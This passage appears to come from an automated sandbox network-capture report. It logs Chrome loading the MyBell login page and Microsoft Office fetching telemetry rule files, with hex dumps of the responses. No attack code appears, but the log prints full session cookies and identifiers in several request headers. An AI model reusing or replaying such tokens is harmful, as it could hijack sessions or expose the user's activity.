                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC2355INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 31 Oct 2025 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 03 Mar 2010 07:01:40 GMT
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 43211
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000b61c75eddd03524f4e0b3628000977b6617a486bc1130e994b8dd8528578f28c08e9b45cbb1130007ac2b57108db3776acc632a29c1a8ff0c58dd76061dacb52900dae04bb186209e90bd754a92d848fe33977472286a992; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC14029INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 64 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 66 62 28 75 2c 74 29 7b 72 65 74 75 72 6e 20 57 61 28 75 29 26 26 22 68 72 65 66 22 3d 3d 3d 74 3f 31 3a 5a 61 28 75 29 26 26 22 76 61 6c 75 65 22 3d 3d 3d 74 3f 33 32 3a 71 63 2e 51 64 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 41 29 7b 72 65 74 75 72 6e 20 41 2e 74 65 73 74 28 74 29 7d 29 3f 31 36 3a 50 61 28 75 29 26 26 22 76 61 6c 75 65 22 3d 3d 3d 74 3f 32 3d 3d 3d 6d 62 28 75 29 3f 31 36 3a 31 3a 31 7d 66 75 6e 63 74 69 6f 6e 20 6d 62 28 75 29 7b 69 66 28 52 61 28 75 29 7c 7c 52 61 28 75 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 72 65 74 75 72 6e 20 31 3b 71 64 2e 68 61 73 28 75 29 26 26 59 63 2e 73 65 74 28 75 2c 59 63 2e 67 65 74 28 75 29 7c 38 29 3b 61 64 2e 68 61 73 28 75 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function dn(){function fb(u,t){return Wa(u)&&"href"===t?1:Za(u)&&"value"===t?32:qc.Qd.some(function(A){return A.test(t)})?16:Pa(u)&&"value"===t?2===mb(u)?16:1:1}function mb(u){if(Ra(u)||Ra(u.parentNode))return 1;qd.has(u)&&Yc.set(u,Yc.get(u)|8);ad.has(u)
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC16384INData Raw: 61 72 6e 28 22 4d 61 73 6b 69 6e 67 20 73 65 6c 65 63 74 6f 72 20 65 76 61 6c 75 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 22 2b 74 2e 6e 61 6d 65 2c 74 29 2c 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 24 61 28 75 29 7b 75 2e 75 62 3d 75 2e 75 62 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 62 28 74 29 7d 29 3b 75 2e 73 62 3d 75 2e 73 62 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 62 28 74 29 7d 29 3b 75 2e 79 62 3d 75 2e 79 62 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 62 28 74 29 7d 29 3b 72 65 74 75 72 6e 20 75 7d 66 75 6e 63 74 69 6f 6e 20 76 28 75 29 7b 76 61 72 20 74 3d 7b 71 62 3a 21 30 2c 75 62 3a 5b 5d 2c 73 62 3a 5b 5d 2c 79 62 3a 5b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: arn("Masking selector evaluation error: "+t.name,t),!1}}function $a(u){u.ub=u.ub.filter(function(t){return nb(t)});u.sb=u.sb.filter(function(t){return nb(t)});u.yb=u.yb.filter(function(t){return nb(t)});return u}function v(u){var t={qb:!0,ub:[],sb:[],yb:[
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:01 UTC12798INData Raw: 3d 74 68 69 73 3b 74 68 69 73 2e 24 63 3d 5b 5d 3b 74 68 69 73 2e 50 67 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 50 29 7b 41 2e 77 65 28 50 29 7d 29 3a 74 68 69 73 2e 77 65 28 74 29 7d 75 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 3d 0a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 41 3b 74 3d 74 2e 73 70 6c 69 74 28 22 2c 22 29 3b 32 3d 3d 3d 4e 75 6d 62 65 72 28 74 5b 30 5d 29 3f 41 3d 7b 61 64 3a 74 2e 73 6c 69 63 65 28 30 2c 34 29 2e 6a 6f 69 6e 28 22 2c 22 29 7d 3a 41 3d 7b 52 67 3a 74 2e 73 6c 69 63 65 28 30 2c 35 29 2e 6a 6f 69 6e 28 22 2c 22 29 2c 61 64 3a 74 2e 73 6c 69 63 65 28 35 2c 39 29 2e 6a 6f 69 6e 28 22 2c 22 29 7d 3b 69 66 28 41 2e 61
                                                                                                                                                                                                                                                                                                                                      Data Ascii: =this;this.$c=[];this.Pg=new WeakMap;Array.isArray(t)?t.forEach(function(P){A.we(P)}):this.we(t)}u.prototype.we=function(t){var A;t=t.split(",");2===Number(t[0])?A={ad:t.slice(0,4).join(",")}:A={Rg:t.slice(0,5).join(","),ad:t.slice(5,9).join(",")};if(A.a


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      58192.168.2.94980613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131200Z-16849878b7898p5f6vryaqvp580000000aa000000000gsz7
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      59192.168.2.94980413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9f4f074d-601e-00ab-77c7-2a66f4000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131200Z-159b85dff8f6x4jjhC1DFW7uqg000000019000000000185b
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      60192.168.2.94980713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131200Z-16849878b78fssff8btnns3b1400000009sg00000000hdez
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      61192.168.2.94980313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC498INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: a606ba7c-601e-003d-0781-2a6f25000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131200Z-17c5cb586f69dpr98vcd9da8e8000000010g0000000087xr
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L2_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      62192.168.2.94980213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:00 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 0697abc8-001e-00ad-714f-28554b000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131200Z-15b8d89586f4zwgbgswvrvz4vs0000000b3g000000001wsw
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:00 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      63192.168.2.949816206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC3043OUTGET /Styles/RSX/mybell/img/img_login_MyBell_June2021.jpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC2345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
